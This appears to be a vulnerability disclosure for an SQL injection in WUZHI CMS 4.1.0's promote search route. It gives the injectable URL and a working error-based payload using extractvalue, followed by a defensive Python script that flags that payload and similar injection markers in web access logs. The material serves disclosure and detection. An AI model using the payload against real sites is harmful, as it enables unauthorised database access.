A SQL injection was discovered in WUZHI CMS 4.1.0. There is a SQL injection vulnerability which allows remote attackers to inject a malicious SQL statement into a server via index.php?m=promote&f=index&v=search&_su=wuzhicms&fieldtype=place&keywords={sql payload}
POC
Code that has loopholes
SQL statement error prompt from the MySQL database
After injecting the payload **jiguang'and+extractvalue(1,concat(0x7e,md5(777)))%23**, the page shows the value of md5(777)
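For defenders reviewing web logs for this issue, the following added example (not part of the original report and not WUZHI CMS code) scans access-log lines for requests to the reported route whose `keywords` value carries error-based injection markers. The combined log format, the function names and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Route parameters named in the report; keywords is the injectable field.
ROUTE = {"m": "promote", "f": "index", "v": "search"}
# MySQL XPath functions used for error-based extraction (the PoC uses extractvalue).
ERROR_FUNCS = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.IGNORECASE)
# Request part of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines; line 2 replays the PoC string from the report
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?m=promote&f=index&v=search&_su=wuzhicms&fieldtype=place&keywords=beijing HTTP/1.1" 200 5120',
    "198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] \"GET /index.php?m=promote&f=index&v=search&_su=wuzhicms&fieldtype=place&keywords=jiguang'and+extractvalue(1,concat(0x7e,md5(777)))%23 HTTP/1.1\" 200 812",
    "192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] \"GET /index.php?m=promote&f=index&v=search&_su=wuzhicms&fieldtype=place&keywords=o'neill HTTP/1.1\" 200 4980",
]

def suspicious_keywords(value):
    """Return the injection indicators found in a decoded keywords value."""
    reasons = []
    if "'" in value:
        reasons.append("single quote")
    if ERROR_FUNCS.search(value):
        reasons.append("XPath error function")
    if "#" in value or "-- " in value:
        reasons.append("SQL comment")
    # A single indicator (an apostrophe in a place name) is too noisy to alert on.
    return reasons if len(reasons) >= 2 else []

def scan(lines):
    """Return (line_number, decoded_keywords, reasons) for flagged requests."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        # parse_qs URL-decodes values: '+' becomes a space, %23 becomes '#'.
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        if any(params.get(k) != [v] for k, v in ROUTE.items()):
            continue
        for value in params.get("keywords", []):
            reasons = suspicious_keywords(value)
            if reasons:
                hits.append((n, value, reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Matching on the decoded value matters here: the PoC hides the comment marker as `%23`, so a check against the raw log line would miss it.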